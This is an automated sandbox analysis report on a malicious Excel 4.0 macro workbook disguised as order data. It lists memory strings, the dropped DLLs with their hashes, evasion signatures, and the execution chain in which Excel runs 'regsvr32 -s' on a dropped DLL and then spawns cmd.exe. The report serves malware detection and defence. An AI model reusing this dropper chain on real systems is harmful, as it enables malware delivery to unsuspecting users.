Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.windows.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://graph.windows.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.local
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://management.azure.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://management.azure.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://messaging.office.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officeapps.live.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://settings.outlook.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.com/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.office.de/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://store.officeppe.com/addinstemplate
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://tasks.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://templatelogging.office.com/client/log
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://web.microsoftstream.com/video/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://webshell.suite.office.com
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://wus2.contentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://wus2.pagecontentsync.
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: E1CDFF1D-0935-429C-935F-99A7DA32E11F.0.dr	String found in binary or memory: https://www.odwebp.svc.ms

System Summary:

Found Excel 4.0 Macro with suspicious formulas

Source: Total_order_data-V2434883.xlsb	Initial sample: CALL
Source: Total_order_data-V2434883.xlsb	Initial sample: CALL
Source: Total_order_data-V2434883.xlsb	Initial sample: EXEC

Office process drops PE file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal80.expl.evad.winXLSB@5/10@0/1

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{40B4E29A-81E2-4785-950C-FD213AB7F011} - OProcSessId.dat

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image1.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image2.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image3.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image4.png
Source: Total_order_data-V2434883.xlsb	Initial sample: OLE zip file path = xl/media/image5.png

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Data Obfuscation:

Registers a DLL

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32 -s ..\kdldyeff.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 2_2_00E02AF0 push dword ptr [edx+14h]; ret

2_2_00E02BFD

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\kdldyeff.dll

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Found dropped PE file which has not been started or loaded

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll

Jump to dropped file

Anti Debugging:

Contains functionality to read the PEB

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_01170456 mov eax, dword ptr fs:[00000030h]		2_2_01170456
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_0117095E mov eax, dword ptr fs:[00000030h]		2_2_0117095E

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\regsvr32.exe

Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe

Jump to behavior

Yara detected Xls With Macro 4.0

Source: Yara match

File source: app.xml, type: SAMPLE

ID:	432263
Product:	CloudBasic
Start time:	23:53:51
Start date:	09.06.2021
Sample:	Total_order_data-V2434883.xlsb
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	3ee5986d7978a5f2df982fce2a3ebf93
SHA1:	8f0e54b80cb391871d3cd1de6dd190ea686f0798
SHA256:	a0a165ea7db4685fb5677e3bc17c6d9ade7224dca824d9de930355f1c40ee0a2
Filetype:	Excel Microsoft Office Binary workbook document (47504/1) 49.74%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E1CDFF1D-0935-429C-935F-99A7DA32E11F	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators	5B697FD2BDEAA84CDA97428A619077E2	8A87EAF1F9495BD158120B6908D566147B08E54D	0022C4154594DEE06BD1F1EAF86895E82142E411D808D37F80AB3E5C2CBB29C4
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\11B5F99.png	PNG image data, 168 x 72, 8-bit/color RGB, non-interlaced	C7ED6FC355D8632DB1464BE3D56BF5CC	615484A338922DDF00B903CFA48060AD60D70207	26000244FBB0C6B2D76F80166CE85700BC96141C6CD80F8B399CA6F15FE3515C
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\39FE7E0F.png	PNG image data, 178 x 76, 8-bit/color RGB, non-interlaced	9AD30E24270C495AE68EAF3A1EEECBFB	8642D256E7FFBEF5804A2D2220A1FE475A99DC36	6D3EAD431ABD110369EFABC6F2E474DC24FA3D7EEC28DE43456407C5BACD6D20
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\4C6BD0C6.png	PNG image data, 264 x 113, 8-bit/color RGB, non-interlaced	B34FB4F2F0F9E70B72BA3AFD028CD97C	C6868336F78DEA1E718965DF3341039581DB5B5A	189D420D344A694FD1928ABACBEC94D9F0EF52BE036CEB8144A9D9A6DD14EAEB
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\A79D60C4.png	PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced	32C83607A5C98C5A634278E5AED3AD61	EDE34ADEA53C413C4AC8215EA48F2F2FD59F1362	4A999E919D85EDD0CD1A772CA3B29F91AEECF77D0BEB11FD1B632B7A8A0686BF
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\B7ECCFF8.png	PNG image data, 288 x 77, 8-bit/color RGB, non-interlaced	839795652A8FE78F26F4D86D757ABDE8	979E5B90C72EA3E5E9D9B506AFDC981BFCA61B60	1A9EF0E2F66682B532D15457635920067C4F29EF762D2E8A3E0363B4CF39C13E
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1E2385B6C669BA98831B97915F6ACEBA	A1966D5CEB273CC669C8D6829E2EC9E842D6E482	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702
C:\Users\user\AppData\Local\Temp\9A810000	data	BFBFB6BA89E73507BAC1C68C39C2089C	4DF55BED20FBB6EB4BD82B3A14099A6F0CA6E408	AFDC508F7F53597FF6E95AED1E5AAA31A5C45995D9FDD7B908DA28BEBBB33CF2
C:\Users\user\Desktop\~$Total_order_data-V2434883.xlsb	data	7AB76C81182111AC93ACF915CA8331D5	68B94B5D4C83A6FB415C8026AF61F3F8745E2559	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
C:\Users\user\kdldyeff.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1E2385B6C669BA98831B97915F6ACEBA	A1966D5CEB273CC669C8D6829E2EC9E842D6E482	337A487F1CB8F16200A5D14CAC1DAC3478E95CF3077B3872D319970131BEA702

Analysis Report Total_order_data-V2434883.xlsb

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs